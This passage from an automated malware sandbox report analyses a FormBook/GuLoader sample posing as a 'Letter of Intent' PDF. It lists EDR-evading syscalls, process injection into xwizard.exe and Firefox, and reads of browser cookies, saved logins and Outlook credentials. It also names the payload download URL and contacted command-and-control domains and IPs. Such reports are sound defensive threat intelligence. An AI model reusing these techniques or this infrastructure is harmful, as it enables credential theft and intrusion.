            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3304FA87 mov eax, dword ptr fs:[00000030h]2_2_3304FA87
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33041AA3 mov eax, dword ptr fs:[00000030h]2_2_33041AA3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33041AA3 mov eax, dword ptr fs:[00000030h]2_2_33041AA3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33041AA3 mov eax, dword ptr fs:[00000030h]2_2_33041AA3
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303DAAC mov ecx, dword ptr fs:[00000030h]2_2_3303DAAC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303DAAC mov ecx, dword ptr fs:[00000030h]2_2_3303DAAC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_3303DAAC mov eax, dword ptr fs:[00000030h]2_2_3303DAAC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F8FB4C mov edi, dword ptr fs:[00000030h]2_2_32F8FB4C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33011ACB mov eax, dword ptr fs:[00000030h]2_2_33011ACB
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33011ACB mov ecx, dword ptr fs:[00000030h]2_2_33011ACB
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_33025AD0 mov eax, dword ptr fs:[00000030h]2_2_33025AD0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9B28 mov eax, dword ptr fs:[00000030h]2_2_32FC9B28
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC9B28 mov eax, dword ptr fs:[00000030h]2_2_32FC9B28
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDB00 mov eax, dword ptr fs:[00000030h]2_2_32FBDB00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDB00 mov eax, dword ptr fs:[00000030h]2_2_32FBDB00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDB00 mov eax, dword ptr fs:[00000030h]2_2_32FBDB00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDB00 mov eax, dword ptr fs:[00000030h]2_2_32FBDB00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FBDB00 mov eax, dword ptr fs:[00000030h]2_2_32FBDB00

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: NULL target: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeSection loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\xwizard.exeThread register set: target process: 4996Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\xwizard.exeThread APC queued: target process: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeJump to behavior
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeProcess created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"Jump to behavior
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D68

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		2
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		312
            Process Injection            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object Model1
            Clipboard Data            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets3
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials24
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550554 Sample: Letter of Intent (LOI) For ... Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 31 www.newhopetoday.app 2->31 33 www.eco-tops.website 2->33 35 6 other IPs or domains 2->35 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 5 other signatures 2->53 10 Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe 2 41 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe 6 10->13         started        process6 dnsIp7 43 evolutioncosmetics.com 69.27.100.185, 443, 49735 VDCCA Canada 13->43 65 Maps a DLL or memory area into another process 13->65 17 ybjXXpYwhPHZD.exe 13->17 injected signatures8 process9 signatures10 45 Found direct / indirect Syscall (likely to bypass EDR) 17->45 20 xwizard.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 ybjXXpYwhPHZD.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.eco-tops.website 203.161.49.193, 50001, 50009, 50010 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.newhopetoday.app 216.40.34.41, 50016, 50017, 50018 TUCOWSCA Canada 23->39 41 3 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe42%ReversingLabsWin32.Trojan.Guloader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.astrext.info/8u3q/0%Avira URL Cloudsafe
            http://www.regents.health/q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k=0%Avira URL Cloudsafe
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.binH0%Avira URL Cloudsafe
            http://www.73613.shop/tizt/0%Avira URL Cloudsafe
            http://www.eco-tops.website/n54u/0%Avira URL Cloudsafe
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin60%Avira URL Cloudsafe
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin0%Avira URL Cloudsafe
            http://www.newhopetoday.app0%Avira URL Cloudsafe
            https://www.evolutioncosmetics.com/0%Avira URL Cloudsafe
            http://www.newhopetoday.app/f83s/0%Avira URL Cloudsafe
            http://www.73613.shop/tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            evolutioncosmetics.com
            		69.27.100.185
            		truefalse
              		unknown
              www.newhopetoday.app
              		216.40.34.41
              		truetrue
                		unknown
                www.73613.shop
                		180.178.39.235
                		truetrue
                  		unknown
                  www.astrext.info
                  		217.160.0.132
                  		truetrue
                    		unknown
                    regents.health
                    		3.33.130.190
                    		truetrue
                      		unknown
                      www.eco-tops.website
                      		203.161.49.193
                      		truetrue
                        		unknown
                        www.regents.health
                        		unknown
                        		unknownfalse
                          		unknown
                          www.evolutioncosmetics.com
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.binfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.eco-tops.website/n54u/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.73613.shop/tizt/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.regents.health/q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k=true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.newhopetoday.app/f83s/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.astrext.info/8u3q/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.73613.shop/tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhetrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.evolutioncosmetics.com/Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabxwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdLetter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.binHLetter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
